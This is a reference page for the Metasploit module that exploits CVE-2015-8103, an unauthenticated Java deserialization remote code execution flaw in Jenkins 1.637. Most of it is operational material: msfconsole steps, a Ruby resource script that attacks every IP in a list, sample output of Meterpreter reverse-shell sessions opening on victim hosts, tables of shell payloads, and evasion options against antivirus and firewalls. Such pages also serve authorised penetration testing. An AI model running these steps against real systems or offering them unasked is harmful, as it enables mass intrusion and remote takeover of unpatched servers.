Jenkins CLI RMI Java Deserialization Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/linux/misc/jenkins_java_deserialize metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Jenkins CLI RMI Java Deserialization Vulnerability
Module: exploit/linux/misc/jenkins_java_deserialize
Source code: modules/exploits/linux/misc/jenkins_java_deserialize.rb
Disclosure date: 2015-11-18
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): java
Supported platform(s): Java
Target service / protocol: -
Target network port(s): 8080
List of CVEs: CVE-2015-8103

This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. Authentication is not required to exploit this vulnerability.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using jenkins_java_deserialize against a single host

Normally, you can use exploit/linux/misc/jenkins_java_deserialize this way:

msf > use exploit/linux/misc/jenkins_java_deserialize
msf exploit(jenkins_java_deserialize) > show targets
    ... a list of targets ...
msf exploit(jenkins_java_deserialize) > set TARGET target-id
msf exploit(jenkins_java_deserialize) > show options
    ... show and set options ...
msf exploit(jenkins_java_deserialize) > exploit

Using jenkins_java_deserialize against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your jenkins_java_deserialize will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/misc/jenkins_java_deserialize")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/misc/jenkins_java_deserialize exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/jenkins_java_deserialize

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(linux/misc/jenkins_java_deserialize) > show info

       Name: Jenkins CLI RMI Java Deserialization Vulnerability
     Module: exploit/linux/misc/jenkins_java_deserialize
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-11-18

Provided by:
  Christopher Frohoff
  Steve Breen
  Dev Mohanty
  Louis Sato
  wvu <[email protected]>
  juan vazquez <[email protected]>
  Wei Chen

Available targets:
  Id  Name
  --  ----
  0   Jenkins 1.637

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  TARGETURI  /                yes       The base path to Jenkins in order to find X-Jenkins-CLI-Port
  TEMP       /tmp             yes       Folder to write the payload to

Payload information:

Description:
  This module exploits a vulnerability in Jenkins. An unsafe 
  deserialization bug exists on the Jenkins master, which allows 
  remote arbitrary code execution. Authentication is not required to 
  exploit this vulnerability.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-8103
  https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py
  https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java
  http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability
  https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11

Module Options


This is a complete list of options available in the linux/misc/jenkins_java_deserialize exploit:

msf6 exploit(linux/misc/jenkins_java_deserialize) > show options

Module options (exploit/linux/misc/jenkins_java_deserialize):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   TARGETURI  /                yes       The base path to Jenkins in order to find X-Jenkins-CLI-Port
   TEMP       /tmp             yes       Folder to write the payload to

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Jenkins 1.637

Advanced Options


Here is a complete list of advanced options supported by the linux/misc/jenkins_java_deserialize exploit:

msf6 exploit(linux/misc/jenkins_java_deserialize) > show advanced

Module advanced options (exploit/linux/misc/jenkins_java_deserialize):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   XJenkinsCliPort                          no        The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/misc/jenkins_java_deserialize module can exploit:

msf6 exploit(linux/misc/jenkins_java_deserialize) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Jenkins 1.637

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/jenkins_java_deserialize exploit:

msf6 exploit(linux/misc/jenkins_java_deserialize) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the linux/misc/jenkins_java_deserialize exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/jenkins_java_deserialize) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Jenkins is not vulnerable, aborting...


Here is a relevant code snippet related to the "<PEER> - Jenkins is not vulnerable, aborting..." error message:

60:	    @jenkins_cli_port || datastore['XJenkinsCliPort']
61:	  end
62:	
63:	  def exploit
64:	    if cli_port == 0 && !vulnerable?
65:	      fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
66:	    end
67:	    invoke_remote_method(set_payload)
68:	    invoke_remote_method(class_load_payload)
69:	  end
70:	

Invalid URI: <VALUE>


Here is a relevant code snippet related to the "Invalid URI: <VALUE>" error message:

78:	      # In case TARGETURI is empty, at least we default to '/'
79:	      u = datastore['TARGETURI']
80:	      u = "/" if u.nil? or u.empty?
81:	      URI(u)
82:	    rescue ::URI::InvalidURIError
83:	      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
84:	      raise Msf::OptionValidateError.new(['TARGETURI'])
85:	    end
86:	  end
87:	
88:	  def normalize_uri(*strs)

TARGETURI


Here is a relevant code snippet related to the "TARGETURI" error message:

79:	      u = datastore['TARGETURI']
80:	      u = "/" if u.nil? or u.empty?
81:	      URI(u)
82:	    rescue ::URI::InvalidURIError
83:	      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
84:	      raise Msf::OptionValidateError.new(['TARGETURI'])
85:	    end
86:	  end
87:	
88:	  def normalize_uri(*strs)
89:	    new_str = strs * "/"

The connection timed out.


Here is a relevant code snippet related to the "The connection timed out." error message:

117:	    res = send_request_cgi({
118:	      'uri' => normalize_uri(target_uri.path)
119:	    })
120:	
121:	    unless res
122:	      fail_with(Failure::Unknown, 'The connection timed out.')
123:	    end
124:	
125:	    http_headers = res.headers
126:	
127:	    unless http_headers['X-Jenkins-CLI-Port']

The server does not have the CLI port that is needed for exploitation.


Here is a relevant code snippet related to the "The server does not have the CLI port that is needed for exploitation." error message:

123:	    end
124:	
125:	    http_headers = res.headers
126:	
127:	    unless http_headers['X-Jenkins-CLI-Port']
128:	      vprint_error('The server does not have the CLI port that is needed for exploitation.')
129:	      return false
130:	    end
131:	
132:	    if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
133:	      @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Christopher Frohoff
  • Steve Breen
  • Dev Mohanty
  • Louis Sato
  • wvu
  • juan vazquez
  • Wei Chen

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.